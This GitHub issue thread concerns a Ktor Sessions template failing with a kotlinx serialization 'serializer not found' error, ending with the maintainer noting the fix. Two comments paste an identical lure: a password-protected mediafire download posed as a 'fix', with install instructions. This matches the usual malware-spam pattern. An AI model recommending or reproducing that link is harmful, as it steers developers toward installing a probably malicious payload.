### ISSUE TITLE
Ktor Sessions is missing @Serializable annotation

### ISSUE THREAD

**Issue by bjhham** [ktorio/ktor-plugin-registry#130]
```
Exception in thread "main" kotlinx.serialization.SerializationException: Serializer for class 'MySession' is not found.
Please ensure that class is marked as '@Serializable' and that the serialization compiler plugin is applied.

	at kotlinx.serialization.internal.Platform_commonKt.serializerNotRegistered(Platform.common.kt:91)
	at kotlinx.serialization.internal.PlatformKt.platformSpecificSerializerNotRegistered(Platform.kt:28)
	at kotlinx.serialization.SerializersKt__SerializersKt.serializer(Serializers.kt:134)
	at kotlinx.serialization.SerializersKt.serializer(Unknown Source)
	at kotlinx.serialization.SerializersKt__SerializersKt.serializer(Serializers.kt:72)
	at kotlinx.serialization.SerializersKt.serializer(Unknown Source)
	at io.ktor.server.sessions.SessionSerializerKt.defaultSessionSerializer(SessionSerializer.kt:40)
	at io.ktor.server.sessions.CookieSessionBuilder.<init>(SessionsBuilder.kt:323)
	at io.ktor.server.sessions.SessionsBuilderKt.cookie(SessionsBuilder.kt:212)
	at com.re.ka.ku.plugins.SecurityKt.configureSecurity$lambda$1(Security.kt:25)
	at io.ktor.server.application.CreatePluginUtilsKt.createRouteScopedPluginInstance(CreatePluginUtils.kt:283)
	at io.ktor.server.application.CreatePluginUtilsKt.access$createRouteScopedPluginInstance(CreatePluginUtils.kt:1)
	at io.ktor.server.application.CreatePluginUtilsKt$createRouteScopedPlugin$1.install(CreatePluginUtils.kt:137)
	at io.ktor.server.application.CreatePluginUtilsKt$createRouteScopedPlugin$1.install(CreatePluginUtils.kt:123)
	at io.ktor.server.application.ApplicationPluginKt.install(ApplicationPlugin.kt:100)
	at com.re.ka.ku.plugins.SecurityKt.configureSecurity(Security.kt:11)
```

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by aretii** [comment]
any solution on this?

> ```
> Exception in thread "main" kotlinx.serialization.SerializationException: Serializer for class 'MySession' is not found.
> Please ensure that class is marked as '@Serializable' and that the serialization compiler plugin is applied.
> 
> 	at kotlinx.serialization.internal.Platform_commonKt.serializerNotRegistered(Platform.common.kt:91)
> 	at kotlinx.serialization.internal.PlatformKt.platformSpecificSerializerNotRegistered(Platform.kt:28)
> 	at kotlinx.serialization.SerializersKt__SerializersKt.serializer(Serializers.kt:134)
> 	at kotlinx.serialization.SerializersKt.serializer(Unknown Source)
> 	at kotlinx.serialization.SerializersKt__SerializersKt.serializer(Serializers.kt:72)
> 	at kotlinx.serialization.SerializersKt.serializer(Unknown Source)
> 	at io.ktor.server.sessions.SessionSerializerKt.defaultSessionSerializer(SessionSerializer.kt:40)
> 	at io.ktor.server.sessions.CookieSessionBuilder.<init>(SessionsBuilder.kt:323)
> 	at io.ktor.server.sessions.SessionsBuilderKt.cookie(SessionsBuilder.kt:212)
> 	at com.re.ka.ku.plugins.SecurityKt.configureSecurity$lambda$1(Security.kt:25)
> 	at io.ktor.server.application.CreatePluginUtilsKt.createRouteScopedPluginInstance(CreatePluginUtils.kt:283)
> 	at io.ktor.server.application.CreatePluginUtilsKt.access$createRouteScopedPluginInstance(CreatePluginUtils.kt:1)
> 	at io.ktor.server.application.CreatePluginUtilsKt$createRouteScopedPlugin$1.install(CreatePluginUtils.kt:137)
> 	at io.ktor.server.application.CreatePluginUtilsKt$createRouteScopedPlugin$1.install(CreatePluginUtils.kt:123)
> 	at io.ktor.server.application.ApplicationPluginKt.install(ApplicationPlugin.kt:100)
> 	at com.re.ka.ku.plugins.SecurityKt.configureSecurity(Security.kt:11)
> ```

**Comment by HGyllensvard** [comment]
Hi 👋 

I just ran into this issue myself. My use case is slightly different, I tried to build a release build of a KMP desktop app, but the error message is identical. The problem was that the Kotlinx-serialization had not been installed correctly. A similar question is asked here on [SSO](https://stackoverflow.com/questions/71988144/serializer-for-class-is-not-found-mark-the-class-as-serializable-or-prov) that helped me.

Good luck!

**Comment by bjhham** [comment]
I fixed this problem with the template back in November and forgot to update the ticket 😄
